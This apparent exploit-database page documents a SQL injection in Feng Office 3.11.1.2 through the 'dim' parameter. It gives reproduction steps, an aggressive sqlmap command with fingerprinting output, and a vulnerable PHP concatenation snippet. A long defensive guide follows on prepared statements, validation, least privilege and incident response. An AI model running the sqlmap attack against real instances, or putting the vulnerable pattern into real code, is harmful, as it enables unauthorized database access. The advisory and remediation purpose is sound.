Feng Office 3.11.1.2 - SQL Injection

Exploit Author: Andrey Stoykov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2025-04-10 
# Exploit Title: Feng Office 3.11.1.2 - SQL Injection
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com


SQL Injection:

1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process

sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
--fingerprint

[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >=3D 5.7
               comment injection fingerprint: MySQL 5.7.37
[...]


Feng Office 3.11.1.2 — SQL Injection: Overview, Impact, Detection and Secure Remediation

SQL injection (SQLi) remains one of the most widespread and dangerous classes of web application vulnerabilities. Products such as collaboration platforms and project-management suites — including older releases of Feng Office — can expose SQLi flaws when user-supplied input is concatenated into database queries without adequate validation or parameterization. This article explains the issue at a technical yet defender-focused level, outlines safe detection and mitigation practices, and provides secure code examples to help developers eliminate SQL injection risks.

What is SQL Injection?

SQL injection occurs when an application incorporates attacker-controlled data into a database query string in a way that allows modification of the intended SQL command. A successful SQLi attack can lead to unauthorized data access, data modification or deletion, privilege escalation, authentication bypass, and in some cases, full system compromise.

  • In-band SQLi — the attacker uses the same communication channel to launch the attack and receive results (e.g., error-based or union-based).
  • Blind SQLi — the application does not return query results directly; the attacker infers information through boolean or time-based responses.
  • Out-of-band SQLi — exploitation triggers an external interaction (e.g., DNS or HTTP callback) to exfiltrate data when direct feedback is unavailable.

Why It Matters for Collaboration Platforms

Collaboration and project-management systems often contain sensitive data: user credentials, private documents, project metadata, and client records. A single vulnerable parameter that is not sanitized can allow access to information across projects or even the entire database, making prompt remediation essential.

Typical Vulnerability Root Causes

  • Concatenating raw HTTP parameters into SQL queries.
  • Missing or incorrect use of parameterized queries / prepared statements.
  • Insufficient input validation and output encoding.
  • Using high-privilege database accounts for routine application queries.
  • Lack of least-privilege design and absence of database hardening.

Safe and Responsible Detection

Testing for SQL injection must be performed only on systems you own or have explicit authorization to test. Unauthorized scanning, exploitation, or data exfiltration is illegal and unethical.

  • Use dedicated test environments that mirror production.
  • Perform vulnerability scans during low-impact windows or on clones of production data (preferably sanitized test data).
  • Prefer non-destructive detection techniques — e.g., observing error messages, response anomalies, or introducing lightweight test markers — instead of destructive payloads.
  • If using automated scanners, configure them to be conservative, log all activity, and run with permission from stakeholders.

How to Harden Applications — Developer-Focused Guidance

Eliminating SQLi requires a defence-in-depth approach: use parameterized queries, adopt least privilege for DB accounts, validate and normalize input, and apply secure coding practices across the stack.

Replace String Concatenation with Parameterized Queries

A common vulnerable pattern concatenates user input directly into SQL strings. Replace this with parameterized queries (prepared statements) provided by your database API or ORM.

/* Vulnerable PHP example (do NOT deploy) */$userInput = $_GET['q'];
$sql = "SELECT id, name FROM projects WHERE name LIKE '%" . $userInput . "%'";
$result = $db->query($sql);

Explanation: This snippet takes a raw GET parameter and concatenates it into a SQL statement. If an attacker injects SQL control characters, they can alter the query logic.

/* Secure PHP using PDO prepared statements */$search = '%' . $_GET['q'] . '%';
$stmt = $pdo->prepare("SELECT id, name FROM projects WHERE name LIKE :search");
$stmt->bindParam(':search', $search, PDO::PARAM_STR);
$stmt->execute();
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

Explanation: The secure variant uses PDO prepared statements where the query structure is fixed and user input is bound as data. Binding prevents input from being interpreted as SQL syntax. Note also the explicit parameter type and the use of placeholders (:search).

Input Validation and Normalization

Validate input for expected types, lengths, and patterns. Reject or canonicalize unexpected values early. For example, numeric identifiers should be cast and range-checked; enumerations should be validated against a known set of values.

// Example: validating and casting an integer ID in PHP
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id <= 0) {
    // handle invalid input
    http_response_code(400);
    exit;
}

Explanation: Using language-provided filtering ensures the input is a valid integer before it is used in queries or other logic. This reduces the attack surface for SQLi and other injection types.

Least-Privilege Database Accounts and Schema Hardening

  • Create separate database accounts with only the privileges needed for the application (SELECT/INSERT/UPDATE/DELETE as appropriate).
  • Avoid using administrative DB users for application connections.
  • Restrict access to sensitive tables and columns; consider views for limited exposures.
  • Enable auditing and monitor unusual queries or prolonged query times.

Web Application Firewalls (WAF) and Monitoring

WAFs can help block many common SQLi patterns and provide an additional layer of protection while code fixes are applied. However, WAFs are not a substitute for secure coding. Logging and alerting on anomalous database queries or input patterns helps detect attempts and informs incident response.

Patch Management and Vendor Updates

When a vulnerability in a packaged product is reported, the fastest mitigation is to:

  • Check for official vendor patches or updated releases and apply them promptly.
  • If no patch is immediately available, apply compensating controls: WAF rules, network segmentation, and stricter DB user privileges.
  • Follow vendor advisories and apply recommended configuration changes.

Testing and Verification Checklist (Defensive)

  • Sanitize and make a list of all input vectors (GET/POST cookies, headers, file uploads, APIs) and ensure each uses parameterized queries or ORM binding.
  • Run authorized static analysis tools on server-side code to find string concatenations that build SQL.
  • Use prepared testing environments to validate fixes; ensure test coverage includes blind and time-based scenarios.
  • Review database privileges and rotate credentials after a confirmed vulnerability.
  • Enable detailed logging for any queries that fail or take unusually long, and review logs after fixes are deployed.

Incident Response Guidance

If you suspect a SQL injection has been exploited:

  • Isolate affected systems to prevent further data exfiltration while preserving evidence.
  • Preserve logs and capture database query logs for forensic analysis.
  • Assess the scope of access and identify exposed data; notify stakeholders per legal and contractual obligations.
  • Patch the vulnerability, rotate credentials, and strengthen monitoring before restoring normal operations.

Secure Coding Best Practices Summary

Area Recommended Action
Query Construction Use parameterized queries or ORM APIs exclusively; avoid string concatenation.
Input Handling Validate, normalize and sanitize inputs based on expected types and lengths.
Database Privilege Least privilege DB accounts, restrict schema access, and use views where appropriate.
Monitoring Enable query logging, anomaly detection, and alerting for suspicious activity.
Patch Management Stay current on vendor updates and apply patches on a tested schedule.

Responsible Disclosure and Coordination

If you discover a vulnerability in a third-party project, coordinate responsibly: notify the vendor privately, provide reproduction steps restricted to an authorized test instance, and follow their disclosure policy. For open-source or community projects, submit patches or mitigations when possible to help everyone stay secure.

Final Notes for Administrators and Developers

SQL injection vulnerabilities are preventable. The most effective long-term defenses are secure coding practices, thorough testing in authorized environments, and a culture of security-aware development and operations. If you maintain an instance of Feng Office or any web application, prioritize parameterized queries, input validation, least privilege, and timely updates to reduce the risk of data compromise.